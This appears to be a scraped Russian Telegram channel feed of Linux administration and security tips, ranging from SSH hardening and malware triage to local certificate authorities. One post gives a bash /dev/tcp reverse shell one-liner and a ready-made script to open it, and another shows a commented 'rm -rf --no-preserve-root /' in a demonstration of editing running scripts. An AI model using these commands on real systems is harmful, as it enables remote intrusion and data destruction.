Media is too big
VIEW IN TELEGRAM
🔐 Защита SSH-сервера: порты, ключи и iptables
Хочешь узнать, как защитить свой SSH-сервер от несанкционированного доступа? В этом видео мы расскажем о лучших практиках, включая порт-нокинг, использование ключей и настройку iptables.
1. Введение в порт-нокинг (00:00):
- Порт-нокинг скрывает открытые порты, делая их доступными только через правильные комбинации стуков. Это как дверь без замочной скважины, которая открывается только при правильной комбинации.
2. Порты и ключи в сетевых протоколах (00:58):
- Порты позволяют нескольким программам работать одновременно. Например, SSH и веб-сервер используют разные порты для разграничения запросов.
3. Защита SSH-сервера (02:39):
- Замена стандартного порта SSH на нестандартный и использование ключей вместо паролей для повышения безопасности.
4. Настройка iptables (15:51):
- Установка и настройка iptables для управления входящими и исходящими соединениями. Это помогает защитить сервер от несанкционированного доступа.
5. Проверка безопасности (22:24):
- Проверка, что порт 45916 не отличается от других, и сканеры портов не могут определить наличие SSH-сервера.
6. Доступ к серверу (23:57):
- Использование утилиты nmp для доступа к серверу через правильные порты.
Заключение (28:30): Порт сервера закрыт снаружи, но доступен при правильном постукивании. Надеемся, что видео было полезным. Ставьте лайки и подписывайтесь на канал!
Источник: https://www.youtube.com/watch?v=5TCvRlD1sSw
📩 Завтра: Вопрос №9 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
________________
Дополнительный материал:
🧠 - Linux и Команды Выключения: Сцена для systemctl
🧠 - Путешествие по команде shutdown
🧠 - Как настроить и использовать Ctrl+Alt+Delete в Linux для надежной перезагрузки
#Linux_youtube @LinuxSkill #Linux #SSH #Security #PortKnocking #Iptables #SysAdmin #DevOps
Хочешь узнать, как защитить свой SSH-сервер от несанкционированного доступа? В этом видео мы расскажем о лучших практиках, включая порт-нокинг, использование ключей и настройку iptables.
1. Введение в порт-нокинг (00:00):
- Порт-нокинг скрывает открытые порты, делая их доступными только через правильные комбинации стуков. Это как дверь без замочной скважины, которая открывается только при правильной комбинации.
2. Порты и ключи в сетевых протоколах (00:58):
- Порты позволяют нескольким программам работать одновременно. Например, SSH и веб-сервер используют разные порты для разграничения запросов.
3. Защита SSH-сервера (02:39):
- Замена стандартного порта SSH на нестандартный и использование ключей вместо паролей для повышения безопасности.
4. Настройка iptables (15:51):
- Установка и настройка iptables для управления входящими и исходящими соединениями. Это помогает защитить сервер от несанкционированного доступа.
5. Проверка безопасности (22:24):
- Проверка, что порт 45916 не отличается от других, и сканеры портов не могут определить наличие SSH-сервера.
6. Доступ к серверу (23:57):
- Использование утилиты nmp для доступа к серверу через правильные порты.
Заключение (28:30): Порт сервера закрыт снаружи, но доступен при правильном постукивании. Надеемся, что видео было полезным. Ставьте лайки и подписывайтесь на канал!
Источник: https://www.youtube.com/watch?v=5TCvRlD1sSw
📩 Завтра: Вопрос №9 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
________________
Дополнительный материал:
🧠 - Linux и Команды Выключения: Сцена для systemctl
🧠 - Путешествие по команде shutdown
🧠 - Как настроить и использовать Ctrl+Alt+Delete в Linux для надежной перезагрузки
#Linux_youtube @LinuxSkill #Linux #SSH #Security #PortKnocking #Iptables #SysAdmin #DevOps
👍18🔥5
🚨 Процесс с неизвестным именем грузит CPU на 25000%! Что происходит?
Привет, повелитель терминала! На одном из серверов Linux обнаружили странный процесс:
- Имя вроде
- Процесс запущен от
- CPU загружено на 25369% (!)
- Файл процесса уже удалён:
Это может быть майнер или вредоносная программа. Простое перезагружение не решает проблему: процесс появляется снова.
🔍 Что делать:
1. Проверить родителя процесса:
2. Узнать командную строку процесса:
3. Скопировать бинарник для анализа:
4. Безопасно изучить его содержимое:
5. Проверить открытые файлы:
6. Изучить логи на момент запуска процесса:
📌 Важно: при компрометации — лучше переустановить систему с чистого образа!
🌐 Источник: https://unix.stackexchange.com/questions/782519/high-cpu-usage-by-process-with-obfuscated-name-on-linux-server-potential-attac
📩 Завтра: Как узнать ВСЁ о железе и системе в Linux за 5 минут
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Неожиданные секреты Linux: 12 утилит, которые спасут твой сервер!
🧠 - Открой для себя 15 малоизвестных команд LINUX, которые изменят твою жизнь
🧠 - Как удалить экспортированную переменную окружения в Linux?
#stackoverflow @LinuxSkill #Linux #Security #Malware #CPU #Root
Привет, повелитель терминала! На одном из серверов Linux обнаружили странный процесс:
- Имя вроде
89cdb92b
, потом меняется на другое (ac1e4262
)- Процесс запущен от
root
- CPU загружено на 25369% (!)
- Файл процесса уже удалён:
/proc/<PID>/exe → (deleted)
Это может быть майнер или вредоносная программа. Простое перезагружение не решает проблему: процесс появляется снова.
🔍 Что делать:
1. Проверить родителя процесса:
pstree -sap <PID>
2. Узнать командную строку процесса:
ps -o args -p <PID>
3. Скопировать бинарник для анализа:
cp /proc/<PID>/exe /tmp/suspect_binary
4. Безопасно изучить его содержимое:
strings /tmp/suspect_binary
5. Проверить открытые файлы:
lsof -p <PID>
6. Изучить логи на момент запуска процесса:
journalctl -S 'YYYY-mm-dd HH:MM'
📌 Важно: при компрометации — лучше переустановить систему с чистого образа!
🌐 Источник: https://unix.stackexchange.com/questions/782519/high-cpu-usage-by-process-with-obfuscated-name-on-linux-server-potential-attac
📩 Завтра: Как узнать ВСЁ о железе и системе в Linux за 5 минут
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Неожиданные секреты Linux: 12 утилит, которые спасут твой сервер!
🧠 - Открой для себя 15 малоизвестных команд LINUX, которые изменят твою жизнь
🧠 - Как удалить экспортированную переменную окружения в Linux?
#stackoverflow @LinuxSkill #Linux #Security #Malware #CPU #Root
Unix & Linux Stack Exchange
High CPU usage by process with obfuscated name on Linux server – Potential attack?
We have been experiencing high load issues on our Linux server recently. Upon checking with the
top
command, we noticed an unknown process with a garbled command name (as shown in following images;
top
command, we noticed an unknown process with a garbled command name (as shown in following images;
👍21
🚀 Reverse Shell на практике: подключаемся к скрытому серверу за 1 минуту!
Привет, цифровые исследователи и администраторы!
Хочешь получить доступ к серверу за NAT или в приватной сети без прямого IP? Без проброса портов и плясок с VPN?
Лови лайфхак с Netcat — проверенный способ настроить Reverse Shell за пару команд!
#Что делаем:
1. У удалённого инженера на своей машине:
> Параметры:
> -
> -
> -
> -
2. На целевом сервере (внутреннем):
И вуаля! Инженер получает полноценный терминал с правами текущего пользователя. 🎯
Важно:
- Проверь IP заранее.
- Убедись в правах доступа.
- Используй только в рамках закона и корпоративных правил! ⚖️
🛠️ Автоматизация: скрипт Reverse Shell за 1 команду
Чтобы ещё быстрее организовать подключение, можно использовать мини-скрипт:
Как использовать:
1. Сохрани этот код в файл, например
2. Выдай права на исполнение:
3. Запусти:
Скрипт сам спросит IP и порт, а дальше всё произойдёт автоматически!
📩 Завтра: Вопрос №27 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Производительность Nginx против Traefik: кто победит?
🧠 - Как уменьшить размер образа Docker: от 1,2 ГБ до 10 МБ
🧠 - Нужно ли ставить кавычки вокруг переменных в shell-скриптах?
#Linux #Netcat #Security #ReverseShell
Привет, цифровые исследователи и администраторы!
Хочешь получить доступ к серверу за NAT или в приватной сети без прямого IP? Без проброса портов и плясок с VPN?
Лови лайфхак с Netcat — проверенный способ настроить Reverse Shell за пару команд!
#Что делаем:
1. У удалённого инженера на своей машине:
nc -lvnp 2288
> Параметры:
> -
-l
— слушать входящие подключения> -
-v
— подробный режим> -
-n
— не использовать DNS> -
-p
— указать порт2. На целевом сервере (внутреннем):
/bin/bash -i > /dev/tcp/IP_инженера/2288 0<&1 2>&1
И вуаля! Инженер получает полноценный терминал с правами текущего пользователя. 🎯
Важно:
- Проверь IP заранее.
- Убедись в правах доступа.
- Используй только в рамках закона и корпоративных правил! ⚖️
🛠️ Автоматизация: скрипт Reverse Shell за 1 команду
Чтобы ещё быстрее организовать подключение, можно использовать мини-скрипт:
#!/bin/bash
read -p "Введите IP инженера: " IP
read -p "Введите порт (по умолчанию 2288): " PORT
PORT=${PORT:-2288}
bash -i >& /dev/tcp/${IP}/${PORT} 0>&1
Как использовать:
1. Сохрани этот код в файл, например
reverse_shell.sh
.2. Выдай права на исполнение:
chmod +x reverse_shell.sh
3. Запусти:
./reverse_shell.sh
Скрипт сам спросит IP и порт, а дальше всё произойдёт автоматически!
📩 Завтра: Вопрос №27 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Производительность Nginx против Traefik: кто победит?
🧠 - Как уменьшить размер образа Docker: от 1,2 ГБ до 10 МБ
🧠 - Нужно ли ставить кавычки вокруг переменных в shell-скриптах?
#Linux #Netcat #Security #ReverseShell
Telegram
Linux Skill - Освой Linux c нуля до DevOps
🎥 Производительность Nginx против Traefik: кто победит?
В этом видео мы сравниваем два популярных обратных прокси-сервера — Nginx и Traefik. Узнай, какой из них лучше справляется с нагрузкой и обеспечивает стабильную работу.
1. Введение и цели тестирования…
В этом видео мы сравниваем два популярных обратных прокси-сервера — Nginx и Traefik. Узнай, какой из них лучше справляется с нагрузкой и обеспечивает стабильную работу.
1. Введение и цели тестирования…
👍15👎1
🚨 Можешь ли ты использовать
👋 Привет, мастер терминала! Иногда нужно понять: можешь ли ты выполнять команды через
⚡ Базовая проверка:
-
- Команда мгновенно завершится с ошибкой, если пароль требуется.
🛡️ Проверка без влияния кэшированных сессий:
-
🔍 Защита от частных NOPASSWD правил:
- Проверяем реальное право на запуск любой команды без пароля.
🌐 Источник: https://unix.stackexchange.com/questions/777552/check-if-current-user-can-run-sudo-without-requiring-a-password
📩 Завтра: Что будет, если ввести неправильный пароль в sudo? (спойлер: тебя унизят)
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Производительность Nginx vs Apache: кто победит?
🧠 - Как измерить время выполнения программы в Linux?
🧠 - Осторожно: Как не стать жертвой сниффинга паролей на Linux!
#stackoverflow @LinuxSkill #linux #bash #sudo #shell #security
sudo
без пароля? Проверь за 5 секунд!👋 Привет, мастер терминала! Иногда нужно понять: можешь ли ты выполнять команды через
sudo
без запроса пароля? Особенно важно для скриптов и автоматизации.⚡ Базовая проверка:
sudo -n true 2>/dev/null || exit 1
-
-n
запрещает запрос пароля.- Команда мгновенно завершится с ошибкой, если пароль требуется.
🛡️ Проверка без влияния кэшированных сессий:
sudo -k
sudo -n true 2>/dev/null || exit 1
-
sudo -k
очищает кэш пароля.🔍 Защита от частных NOPASSWD правил:
rand=$(mktemp /tmp/true.XXXXX)
cp /usr/bin/true "$rand"
sudo -n "$rand" 2>/dev/null && echo "Есть доступ" || echo "Нет доступа"
rm "$rand"
- Проверяем реальное право на запуск любой команды без пароля.
🌐 Источник: https://unix.stackexchange.com/questions/777552/check-if-current-user-can-run-sudo-without-requiring-a-password
📩 Завтра: Что будет, если ввести неправильный пароль в sudo? (спойлер: тебя унизят)
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Производительность Nginx vs Apache: кто победит?
🧠 - Как измерить время выполнения программы в Linux?
🧠 - Осторожно: Как не стать жертвой сниффинга паролей на Linux!
#stackoverflow @LinuxSkill #linux #bash #sudo #shell #security
Unix & Linux Stack Exchange
Check if current user can run sudo without requiring a password
I want to check if the current user running a BASH shell script has access to passwordless sudo or not. If they don't, I'd rather have the script exit rather than prompting them for a password.
👍11
🚨 Почему
Привет, покоритель терминала! 👨💻👩💻
Многие думают, что
Терминальные эмуляторы — сложные программы. Если файл содержит хитро сформированные escape-последовательности, это может:
- зависнуть весь терминал,
- испортить буфер обмена через OSC 52,
- вызвать баги в системе.
Терминалы вроде GNOME Terminal или xterm исправили многие уязвимости, но 100% защиты нет. Особенно, если файл пришёл из сомнительного источника.
✅ Как безопасно просматривать файлы:
- Используй
- Открывай файлы через
- Никогда не доверяй логам и текстам из внешних источников.
🔒 В безопасности даже самые простые команды требуют внимательности!
🌐 Источник: https://unix.stackexchange.com/questions/780938/is-it-still-unsafe-to-cat-an-arbitrary-file
📩 Завтра: Быстрое обнаружение проблем в сети через массовый пинг
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Урок 5 — Функции Bash за 49 минут: основы, примеры, фишки
🧠 - Можешь ли ты использовать sudo без пароля? Проверь за 5 секунд!
🧠 - Что будет, если ввести неправильный пароль в sudo?
#stackoverflow #linux #bash #security #terminal #linuxskill
cat
всё ещё опасен в 2025 году?Привет, покоритель терминала! 👨💻👩💻
Многие думают, что
cat
— это безопасная команда для просмотра файлов. Но даже сегодня простое cat file
может быть рискованным!Терминальные эмуляторы — сложные программы. Если файл содержит хитро сформированные escape-последовательности, это может:
- зависнуть весь терминал,
- испортить буфер обмена через OSC 52,
- вызвать баги в системе.
Терминалы вроде GNOME Terminal или xterm исправили многие уязвимости, но 100% защиты нет. Особенно, если файл пришёл из сомнительного источника.
✅ Как безопасно просматривать файлы:
- Используй
cat -v file
— выводит управляющие символы видимыми.- Открывай файлы через
less
(безопаснее для длинного вывода).- Никогда не доверяй логам и текстам из внешних источников.
🔒 В безопасности даже самые простые команды требуют внимательности!
🌐 Источник: https://unix.stackexchange.com/questions/780938/is-it-still-unsafe-to-cat-an-arbitrary-file
📩 Завтра: Быстрое обнаружение проблем в сети через массовый пинг
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Урок 5 — Функции Bash за 49 минут: основы, примеры, фишки
🧠 - Можешь ли ты использовать sudo без пароля? Проверь за 5 секунд!
🧠 - Что будет, если ввести неправильный пароль в sudo?
#stackoverflow #linux #bash #security #terminal #linuxskill
Unix & Linux Stack Exchange
Is it still unsafe to cat an arbitrary file?
I read this post today and the answers claimed that certain escape sequences could be dangerous in some terminals, this post also has people saying that it can even be unsafe to simply view log fil...
👍13🔥2
💣 Как можно случайно сломать систему, установив ПО вручную?
Привет, линуксоид! 👋
Кажется, что скачать программу с сайта и установить её вручную — это быстро и удобно. Но в Linux это может стоить работоспособности всей системы.
Когда ты устанавливаешь программы через:
-
- компиляцию из исходников
- .deb файлы вне репозиториев
⚡ ты обходишь пакетный менеджер (apt, dnf), и:
- система не отслеживает установку
- обновления и удаление могут стать проблемой
- легко получить конфликт версий библиотек
✅ Как безопасно устанавливать ПО:
- Использовать
- Для .deb-файлов —
- Избегать скриптов
- Размещать ручные установки в
Помни: пакетный менеджер — это твой друг в Linux. 🛡
🌐 Источник: https://unix.stackexchange.com/questions/782971/is-it-safe-to-install-programs-other-than-with-a-distros-package-manager
📩 Завтра: Как etckeeper спасает сервер от криворуких админов!
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Линус Торвальдс — Человек, который придумал Linux [TED]
🧠 - Карта развития Linux-специалиста
🧠 - Операционная система - общие сведения
#stackoverflow #linux #security #package_manager #apt #bash #linuxskill
Привет, линуксоид! 👋
Кажется, что скачать программу с сайта и установить её вручную — это быстро и удобно. Но в Linux это может стоить работоспособности всей системы.
Когда ты устанавливаешь программы через:
-
curl | sh
- компиляцию из исходников
- .deb файлы вне репозиториев
⚡ ты обходишь пакетный менеджер (apt, dnf), и:
- система не отслеживает установку
- обновления и удаление могут стать проблемой
- легко получить конфликт версий библиотек
✅ Как безопасно устанавливать ПО:
- Использовать
apt
или официальные репозитории.- Для .deb-файлов —
sudo apt install ./file.deb
(а не dpkg -i
).- Избегать скриптов
curl | sh
без проверки кода.- Размещать ручные установки в
/usr/local/
или $HOME/.local
.Помни: пакетный менеджер — это твой друг в Linux. 🛡
🌐 Источник: https://unix.stackexchange.com/questions/782971/is-it-safe-to-install-programs-other-than-with-a-distros-package-manager
📩 Завтра: Как etckeeper спасает сервер от криворуких админов!
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Линус Торвальдс — Человек, который придумал Linux [TED]
🧠 - Карта развития Linux-специалиста
🧠 - Операционная система - общие сведения
#stackoverflow #linux #security #package_manager #apt #bash #linuxskill
Unix & Linux Stack Exchange
Is it safe to install programs other than with a distro's package manager?
When I moved from Windows to Linux, I have been mercifully blessed with package managers. Most of the time, the official repositories of my distro (currently Debian 12) will have the package I need...
👍18🔥2
🔥 Почему в Linux нужно запускать скрипты через ./ ?
Доброе утро, мастера консоли! ☕️
Каждый в начале пути сталкивается с ошибкой:
Вроде скрипт есть, права +x есть… а запустить нельзя.
В чём подвох?
💡 Всё просто: оболочка ищет команды только в каталогах, прописанных в
Текущая директория (
Чтобы запустить скрипт из текущей папки, нужно указать явно:
Тем самым ты говоришь системе: "Запусти ЭТОТ конкретный файл, а не ищи его где-то в системных каталогах".
✅ Почему это важно для безопасности:
Представь, ты работаешь под рутом и влетаешь в папку пользователя. А там злой скрипт с именем
✔️ Для надёжной работы cron-джобов или скриптов в автоматизации всегда указывай полные пути:
Или определяй команды явно:
И помни — добавлять
📩 Завтра: Вопрос №35 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Управление процессами: Конвейер (pipeline)
🧠 - Управление процессами: Создание и выполнение скриптов командной строки
🧠 - Установка Docker
#Linux_Mastery #bash #linux #security
Доброе утро, мастера консоли! ☕️
Каждый в начале пути сталкивается с ошибкой:
script.sh: command not found
Вроде скрипт есть, права +x есть… а запустить нельзя.
В чём подвох?
💡 Всё просто: оболочка ищет команды только в каталогах, прописанных в
$PATH
. Текущая директория (
.
) туда по умолчанию не входит — из соображений безопасности!Чтобы запустить скрипт из текущей папки, нужно указать явно:
./script.sh
Тем самым ты говоришь системе: "Запусти ЭТОТ конкретный файл, а не ищи его где-то в системных каталогах".
✅ Почему это важно для безопасности:
Представь, ты работаешь под рутом и влетаешь в папку пользователя. А там злой скрипт с именем
ls
. Без ./ ты бы случайно его запустил вместо нормального ls
. Результат: потеря контроля над сервером.✔️ Для надёжной работы cron-джобов или скриптов в автоматизации всегда указывай полные пути:
/bin/bash /home/user/script.sh
Или определяй команды явно:
CAT=$(which cat)
$CAT script.sh
И помни — добавлять
.
в $PATH
крайне не рекомендуется! Это открывает брешь для атак.📩 Завтра: Вопрос №35 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Управление процессами: Конвейер (pipeline)
🧠 - Управление процессами: Создание и выполнение скриптов командной строки
🧠 - Установка Docker
#Linux_Mastery #bash #linux #security
Telegram
Linux Skill - Освой Linux c нуля до DevOps
Бесплатный курс по Linux c нуля до DevOps
Модуль 2. Управление процессами:
- Конвейер (pipeline)
https://www.youtube.com/embed/NLGfFJjdWMg?si=Kj3ZYjqu7uaMSq12
Модуль 2. Управление процессами:
- Конвейер (pipeline)
https://www.youtube.com/embed/NLGfFJjdWMg?si=Kj3ZYjqu7uaMSq12
👍22
🚀 11 SSH-команд, после которых ты удалишь половину скриптов
Привет, покоритель удалённых серверов! 👋
Устал писать длинные bash-скрипты для простых SSH-задач? Подготовил для тебя команды, которые заменят кучу твоих велосипедов одной строкой.
____________________
Дополнительный материал:
🧠 - Сетевые основы: Удаленное управление
🧠 - Сетевые основы: Безопасность
🧠 - Основы программирования: Основы языка программирования
#инфографика #SSH #Linux #DevOps #Sysadmin #Security #Automation
Привет, покоритель удалённых серверов! 👋
Устал писать длинные bash-скрипты для простых SSH-задач? Подготовил для тебя команды, которые заменят кучу твоих велосипедов одной строкой.
____________________
Дополнительный материал:
🧠 - Сетевые основы: Удаленное управление
🧠 - Сетевые основы: Безопасность
🧠 - Основы программирования: Основы языка программирования
#инфографика #SSH #Linux #DevOps #Sysadmin #Security #Automation
👍16
🚨 НИКОГДА не редактируй bash-скрипт во время его выполнения!
Привет, повелитель терминала! 👋
Знаешь, что может превратить безобидный скрипт в оружие массового уничтожения данных? Всего одно неосторожное редактирование.
💣 Смотри, какая бомба:
Выглядит безопасно? Команда
⚡ Что происходит:
1. Запускаешь скрипт → bash начинает читать его частями
2. Меняешь
3. Сохраняешь файл → смещение байтов сбивается
4. BOOM! → bash читает
🔍 Доказательство через strace:
🛡️ Как защититься:
• Копируй скрипт перед редактированием
• Останови выполнение перед правками
• Используй блокировки файлов
• Тестируй на копиях важных скриптов
💡 Вывод
Bash читает скрипт блоками по 64 байта и отслеживает позицию. Удаление символов сдвигает содержимое, но не позицию чтения!
🌐 Источник: https://habr.com/ru/articles/500832/
____________________
Дополнительный материал:
🧠 - GRUB Files Unveiled: Путеводитель по конфигурационным файлам
🧠 - Как настроить автоматическое включение вашего компьютера с помощью RTC
🧠 - GRUB Rescue Ops: Как оживить систему, замершую на grub>
#Linux_Mastery #Linux #Bash #Security #DevOps #SysAdmin #ScriptSafety
Привет, повелитель терминала! 👋
Знаешь, что может превратить безобидный скрипт в оружие массового уничтожения данных? Всего одно неосторожное редактирование.
💣 Смотри, какая бомба:
#!/bin/bash
sleep 30
#rm -rf --no-preserve-root /
echo "Time's up!"
Выглядит безопасно? Команда
rm
закомментирована, скрипт просто ждёт 30 секунд. Но стоит тебе отредактировать его во время выполнения...⚡ Что происходит:
1. Запускаешь скрипт → bash начинает читать его частями
2. Меняешь
sleep 30
на sleep 3
в редакторе3. Сохраняешь файл → смещение байтов сбивается
4. BOOM! → bash читает
rm -rf /
вместо комментария🔍 Доказательство через strace:
# Открытие скрипта
openat(AT_FDCWD, "delay.sh", O_RDONLY) = 3
# Парсинг первой строчки (до 80 символов)
read(3, "#!/bin/bash\nsleep 30\n#echo \"Don'"..., 80) = 64
# Возврат к началу
lseek(3, 0, SEEK_SET) = 0
# Переключение на на файловый дескриптор 255
dup2(3, 255) = 255
# Чтение 64-байтового куска файла, чтобы получить команду
read(255, "#!/bin/bash\nsleep 30\n#echo \"Don'"..., 64) = 64
# Поместить курсор обратно в конец команды, которую мы собираемся выполнить
# Offset 21 is the `#`
lseek(255, -43, SEEK_CUR) = 21
# Приостановка выполнения, уход в sleep
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 2072
# До возвращения wait4 файл редактируется с `30` на `3`
# Чтение 64-байтового куска файла, чтобы получить следующую команду
# В этом демо я заменил опасную команду на echo
read(255, "echo \"Don't execute me\"\necho \"Ti"..., 64) = 42
# Bash решает выполнить оба echo одновременно без нового чтения
# Очевидно, что-то идёт не так
write(1, "Don't execute me\n", 17) = 17
write(1, "Time's up!\n", 11) = 11
# Чтение следующего фрагмента и обнаружение конца файла
read(255, "", 64) = 0
🛡️ Как защититься:
• Копируй скрипт перед редактированием
• Останови выполнение перед правками
• Используй блокировки файлов
• Тестируй на копиях важных скриптов
💡 Вывод
Bash читает скрипт блоками по 64 байта и отслеживает позицию. Удаление символов сдвигает содержимое, но не позицию чтения!
🌐 Источник: https://habr.com/ru/articles/500832/
____________________
Дополнительный материал:
🧠 - GRUB Files Unveiled: Путеводитель по конфигурационным файлам
🧠 - Как настроить автоматическое включение вашего компьютера с помощью RTC
🧠 - GRUB Rescue Ops: Как оживить систему, замершую на grub>
#Linux_Mastery #Linux #Bash #Security #DevOps #SysAdmin #ScriptSafety
Хабр
Осторожнее с редактированием bash-скриптов
Предположим, я написал такой bash-скрипт с названием delay.sh . Как думаете, что он делает? #!/bin/bash sleep 30 #rm -rf --no-preserve-root / echo "Time's up!" Похоже, он ожидает 30 секунд,...
👍21
🔐 Забыл заблокировать ПК? Твой телефон сделает это за тебя
Привет, мастер безопасности!
Знакомо? Отошёл за кофе, а коллега уже изучает твой браузер. Сейчас покажу, как превратить твой смартфон в умный ключ — Linux будет автоматически блокироваться, когда ты уходишь.
📌 Что понадобится:
- Bluetooth на компе и телефоне
- 5 минут времени
- Bash-скрипт ниже
🔧 Настройка за 3 шага:
1. Найди MAC-адрес телефона:
2. Создай скрипт автоблокировки:
3. Запусти и забудь:
💡 Как это работает:
Скрипт каждые 5 секунд проверяет, видит ли компьютер твой телефон по Bluetooth. Ушёл дальше 10 метров — экран автоматически блокируется. Вернулся — всё как было.
____________________
Дополнительный материал:
🧠 - GRUB Boot Mastery: Изучаем искусство восстановления
🧠 - Как настроить ночное выключение вашего компьютера с помощью cron
🧠 - GRUB Makeover: Как дать новую жизнь конфигурации загрузчика
#Linux_Mastery #Linux #Security #Bash #Bluetooth #Desktop #Automation
Привет, мастер безопасности!
Знакомо? Отошёл за кофе, а коллега уже изучает твой браузер. Сейчас покажу, как превратить твой смартфон в умный ключ — Linux будет автоматически блокироваться, когда ты уходишь.
📌 Что понадобится:
- Bluetooth на компе и телефоне
- 5 минут времени
- Bash-скрипт ниже
🔧 Настройка за 3 шага:
1. Найди MAC-адрес телефона:
# Включи Bluetooth на телефоне и запусти
hcitool scan
2. Создай скрипт автоблокировки:
#!/bin/bash
# MAC-адрес твоего телефона
DEVICE="AA:BB:CC:DD:EE:FF"
# Имя устройства из hcitool scan
DEV_NAME="My Phone"
# Интервал проверки (сек)
INTERVAL=5
# PID xscreensaver
XSS_PID=
# Запускаем xscreensaver, если не запущен
pgrep xscreensaver
if [ $? -eq 1 ]; then
echo "Starting xscreensaver..."
xscreensaver &
fi
# Основной цикл проверки
while [ 1 ]; do
opt=$(hcitool name $DEVICE)
if [ "$opt" = "$DEV_NAME" ]; then
echo "Device '$opt' found"
if [ -n "$XSS_PID" ]; then
echo "Killing $XSS_PID"
kill $XSS_PID
XSS_PID=
fi
else
echo "Can't find device $DEVICE ($DEV_NAME); locking!"
xscreensaver-command -lock
XSS_PID=$!
fi
sleep $INTERVAL
done
3. Запусти и забудь:
chmod +x bluetooth-lock.sh
./bluetooth-lock.sh &
💡 Как это работает:
Скрипт каждые 5 секунд проверяет, видит ли компьютер твой телефон по Bluetooth. Ушёл дальше 10 метров — экран автоматически блокируется. Вернулся — всё как было.
____________________
Дополнительный материал:
🧠 - GRUB Boot Mastery: Изучаем искусство восстановления
🧠 - Как настроить ночное выключение вашего компьютера с помощью cron
🧠 - GRUB Makeover: Как дать новую жизнь конфигурации загрузчика
#Linux_Mastery #Linux #Security #Bash #Bluetooth #Desktop #Automation
Telegram
Linux Skill - Освой Linux c нуля до DevOps
🚀🛠️ GRUB Boot Mastery: Изучаем искусство восстановления! 🖥️🔍
Привет, мастера загрузки и покорители GRUB! Сегодня мы погрузимся в мир загрузочных секретов и узнаем, как действовать, когда система отказывается стартовать. Приготовьтесь к путешествию в глубины…
Привет, мастера загрузки и покорители GRUB! Сегодня мы погрузимся в мир загрузочных секретов и узнаем, как действовать, когда система отказывается стартовать. Приготовьтесь к путешествию в глубины…
👍22🔥8👀1
🔥 HTTPS в локалке: от красного замка к зелёному за 10 команд
Привет, укротитель сертификатов!
Браузер постоянно ругается на самоподписанный сертификат? Надоело кликать "Продолжить несмотря на риск"? Создаём свой CA (Certificate Authority - центр сертификации) и забываем про предупреждения навсегда!
🔧 Создаём свой CA:
📝 Генерируем сертификат для сервера:
⚙️ Конфиг с альтернативными именами:
🚀 Подписываем сертификат:
🔧 Настройка Nginx:
💡 Финальный штрих:
Добавь myCA.crt в доверенные корневые сертификаты на клиенте. Всё! Зелёный замок на 27 лет!
____________________
Дополнительный материал:
🧠 - Настройка Ctrl+Alt+Delete в Linux: Перезагрузка или Выключение?
🧠 - GRUB's Got Talent": За кулисами самотестирования компьютера
🧠 - Linux на ночь: Как уложить систему спать с помощью systemctl
#Linux_Mastery #ssl #nginx #https #certificates #Linux #security
Привет, укротитель сертификатов!
Браузер постоянно ругается на самоподписанный сертификат? Надоело кликать "Продолжить несмотря на риск"? Создаём свой CA (Certificate Authority - центр сертификации) и забываем про предупреждения навсегда!
🔧 Создаём свой CA:
# mkdir ~/tls && cd ~/tls
# openssl ecparam -out myCA.key -name prime256v1 -genkey
# openssl req -x509 -new -nodes -key myCA.key -sha256 -days 9999 -out myCA.crt
📝 Генерируем сертификат для сервера:
# openssl genrsa -out zabbix.internal.key 2048
# openssl req -new -key zabbix.internal.key -out zabbix.internal.csr
⚙️ Конфиг с альтернативными именами:
# mcedit zabbix.internal.ext
authorityKeyIdentifier=keyid,issuer
basicConstraints=CA:FALSE
keyUsage = digitalSignature, nonRepudiation, keyEncipherment, dataEncipherment
subjectAltName = @alt_names
[alt_names]
IP.1 = 172.30.245.222
DNS.1 = zabbix.internal
🚀 Подписываем сертификат:
# openssl x509 -req -in zabbix.internal.csr -CA myCA.crt -CAkey myCA.key \
-CAcreateserial -out zabbix.internal.crt -days 9999 -sha256 -extfile zabbix.internal.ext
🔧 Настройка Nginx:
# mkdir /etc/nginx/certs
# cp zabbix.internal.crt /etc/nginx/certs/.
# cp zabbix.internal.key /etc/nginx/certs/.
# openssl dhparam -out /etc/ssl/certs/dhparam.pem 2048
listen 443 http2 ssl;
server_name zabbix.internal 172.30.245.222;
ssl_certificate /etc/nginx/certs/zabbix.internal.crt;
ssl_certificate_key /etc/nginx/certs/zabbix.internal.key;
ssl_dhparam /etc/ssl/certs/dhparam.pem;
💡 Финальный штрих:
Добавь myCA.crt в доверенные корневые сертификаты на клиенте. Всё! Зелёный замок на 27 лет!
____________________
Дополнительный материал:
🧠 - Настройка Ctrl+Alt+Delete в Linux: Перезагрузка или Выключение?
🧠 - GRUB's Got Talent": За кулисами самотестирования компьютера
🧠 - Linux на ночь: Как уложить систему спать с помощью systemctl
#Linux_Mastery #ssl #nginx #https #certificates #Linux #security
Telegram
Linux Skill - Освой Linux c нуля до DevOps
🎛️🔧 "Настройка Ctrl+Alt+Delete в Linux: Перезагрузка или Выключение?" ⌨️🔄
Привет, мастера консоли и поклонники кастомизации! Сегодня мы поговорим о том, как настроить поведение знаменитой комбинации клавиш Ctrl+Alt+Delete в Linux. 🐧🛠️
🎯 Задача: Вы хотите…
Привет, мастера консоли и поклонники кастомизации! Сегодня мы поговорим о том, как настроить поведение знаменитой комбинации клавиш Ctrl+Alt+Delete в Linux. 🐧🛠️
🎯 Задача: Вы хотите…
👍20
🎯 Nginx выдаёт домены по IP? Решение, которое работает
